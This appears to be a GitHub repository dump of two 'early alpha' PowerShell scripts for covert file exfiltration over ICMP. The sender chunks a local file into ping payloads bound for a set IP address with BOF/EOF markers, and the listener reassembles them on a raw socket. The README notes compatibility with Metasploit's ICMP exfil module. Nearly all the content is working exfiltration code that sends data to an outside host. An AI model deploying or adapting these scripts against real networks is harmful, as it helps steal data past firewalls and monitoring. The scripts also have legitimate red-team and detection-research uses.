├── README.md ├── LICENSE ├── Powershell-ICMP-Sender.ps1 └── Powershell-ICMP-Listener.ps1 /README.md: -------------------------------------------------------------------------------- 1 | # Powershell-ICMP 2 | 3 | These scrips are early alpha. 4 | 5 | # Powershell-ICMP-Listener.ps1 6 | This script is used to setup a listener on a server. 7 | 8 | # Powershell-ICMP-Sender.ps1 9 | This script is used to send files using the data field in ICMP packets. 10 | This script can also be used against Metasploit's ICMP exfil module. 11 | https://www.rapid7.com/db/modules/auxiliary/server/icmp_exfil 12 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | BSD 3-Clause License 2 | 3 | Copyright (c) 2017, Oddvar Moe 4 | All rights reserved. 5 | 6 | Redistribution and use in source and binary forms, with or without 7 | modification, are permitted provided that the following conditions are met: 8 | 9 | * Redistributions of source code must retain the above copyright notice, this 10 | list of conditions and the following disclaimer. 11 | 12 | * Redistributions in binary form must reproduce the above copyright notice, 13 | this list of conditions and the following disclaimer in the documentation 14 | and/or other materials provided with the distribution. 15 | 16 | * Neither the name of the copyright holder nor the names of its 17 | contributors may be used to endorse or promote products derived from 18 | this software without specific prior written permission. 19 | 20 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 21 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 22 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 23 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 24 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 25 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 26 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 27 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 28 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 29 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 30 | -------------------------------------------------------------------------------- /Powershell-ICMP-Sender.ps1: -------------------------------------------------------------------------------- 1 | # Powershell-ICMP-Sender 2 | # ICMP Exfiltration script 3 | # Author: Oddvar Moe (@oddvarmoe) 4 | # License: BSD 3-Clause 5 | # Required Dependencies: None 6 | # Optional Dependencies: None 7 | # Early alpha version 8 | 9 | # Script will take the infile you specify in the $inFile variable and divide it into 1472 byte chunks before sending 10 | # This script also works with Metasploit's ICMP Exfil module: https://www.rapid7.com/db/modules/auxiliary/server/icmp_exfil 11 | # Inspiration from : https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellIcmp.ps1 12 | 13 | # TODO: 14 | # Need transfer check 15 | # Speeding it up using different methods 16 | # Make it function based 17 | 18 | $IPAddress = "192.168.0.74" 19 | $ICMPClient = New-Object System.Net.NetworkInformation.Ping 20 | $PingOptions = New-Object System.Net.NetworkInformation.PingOptions 21 | $PingOptions.DontFragment = $true 22 | #$PingOptions.Ttl = 10 23 | 24 | # Must be divided into 1472 chunks 25 | [int]$bufSize = 1472 26 | $inFile = "C:\temp\test3.txt" 27 | 28 | 29 | $stream = [System.IO.File]::OpenRead($inFile) 30 | $chunkNum = 0 31 | $TotalChunks = [math]::floor($stream.Length / 1472) 32 | $barr = New-Object byte[] $bufSize 33 | 34 | # Start of Transfer 35 | $sendbytes = ([text.encoding]::ASCII).GetBytes("BOFAwesomefile.txt") 36 | $ICMPClient.Send($IPAddress,10, $sendbytes, $PingOptions) | Out-Null 37 | 38 | 39 | while ($bytesRead = $stream.Read($barr, 0, $bufsize)) { 40 | $ICMPClient.Send($IPAddress,10, $barr, $PingOptions) | Out-Null 41 | $ICMPClient.PingCompleted 42 | 43 | #Missing check if transfer is okay, added sleep. 44 | sleep 1 45 | #$ICMPClient.SendAsync($IPAddress,60 * 1000, $barr, $PingOptions) | Out-Null 46 | Write-Output "Done with $chunkNum out of $TotalChunks" 47 | $chunkNum += 1 48 | } 49 | 50 | # End the transfer 51 | $sendbytes = ([text.encoding]::ASCII).GetBytes("EOF") 52 | $ICMPClient.Send($IPAddress,10, $sendbytes, $PingOptions) | Out-Null 53 | Write-Output "File Transfered" -------------------------------------------------------------------------------- /Powershell-ICMP-Listener.ps1: -------------------------------------------------------------------------------- 1 | # Powershell-ICMP-Listener 2 | # ICMP Exfiltration server script 3 | # Author: Oddvar Moe (@oddvarmoe) 4 | # License: BSD 3-Clause 5 | # Required Dependencies: None 6 | # Optional Dependencies: None 7 | # Early alpha version 8 | 9 | # Script will keep running until a ping packet with BOF is received 10 | # Script will then add the data from the ICMP packet until EOF is received 11 | 12 | ### NOTES TO MYSELF ### 13 | #IP packet stops at [20] 14 | #ICMP starts from [21] - https://en.wikipedia.org/wiki/Internet_Control_Message_Protocol 15 | #$buffer[9] = Type... 1 = ICMP , 6 = TCP 16 | #$buffer[12]+[13]+[14]+[15] = source IP 17 | #$buffer[16]+[17]+[18]+[19] = destination IP 18 | #$buffer[20] = ICMP Type 19 | #$buffer[28] = DATA portion of ICMP 20 | # Entire packet in HEX: [System.BitConverter]::ToString($buffer[0..1499]) 21 | 22 | # Inspiration and help 23 | # http://www.drowningintechnicaldebt.com/RoyAshbrook/archive/2013/03/08/how-to-write-a-basic-sniffer-in-powershell.aspx 24 | 25 | # TODO: 26 | # Need to find a dynamic way to enumerate filename and length 27 | # Gain more speed using different methods - IT IS SLOW NOW 28 | # Convert it to function 29 | # Confirm transfer of each packet 30 | # Only allow specified IP to send data 31 | # Use filename sent from Client script to save on server side 32 | 33 | $Outfile = "C:\temp\Exfiltrate.txt" 34 | $IP = "192.168.0.74" 35 | 36 | # Initialize socket and bind 37 | $ICMPSocket = New-Object System.Net.Sockets.Socket([Net.Sockets.AddressFamily]::InterNetwork,[Net.Sockets.SocketType]::Raw, [Net.Sockets.ProtocolType]::Icmp) 38 | $Address = New-Object system.net.IPEndPoint([system.net.IPAddress]::Parse($IP), 0) 39 | $ICMPSocket.bind($Address) 40 | $ICMPSocket.IOControl([Net.Sockets.IOControlCode]::ReceiveAll, [BitConverter]::GetBytes(1), $null) 41 | $buffer = new-object byte[] $ICMPSocket.ReceiveBufferSize 42 | 43 | # Set Capture to false 44 | $Capture = $false 45 | 46 | while($True) 47 | { 48 | #Only inspect the request packets - type 8 49 | # Request 50 | if([System.BitConverter]::ToString($buffer[20]) -eq "08") 51 | { 52 | #IF EOF is received in data segment of ICMP the script will exit the loop. 53 | if([System.Text.Encoding]::ASCII.GetString($buffer[28..30]) -eq "EOF") 54 | { 55 | Write-Output "EOF received - transfer complete - Saving file and stopping script" 56 | #create file 57 | [System.Text.Encoding]::ASCII.GetString($Transferbytes) | Out-File $Outfile 58 | $Capture = $false 59 | break 60 | } 61 | 62 | 63 | if($Capture) 64 | { 65 | #Capture filecontent into bytearray" 66 | [byte[]]$Transferbytes += $buffer[28..1499] 67 | } 68 | # Byte 28 = BOF 69 | if([System.Text.Encoding]::ASCII.GetString($buffer[28..30]) -eq "BOF") 70 | { 71 | #BOF MATCH 72 | Write-Output "BOF received - Starting Capture of file" 73 | # Need to find a dynamic way to enumerate filename 74 | $Filename = [System.Text.Encoding]::ASCII.GetString($buffer[31..46]) 75 | $Capture = $true 76 | } 77 | } 78 | $null = $ICMPSocket.Receive($buffer) 79 | } --------------------------------------------------------------------------------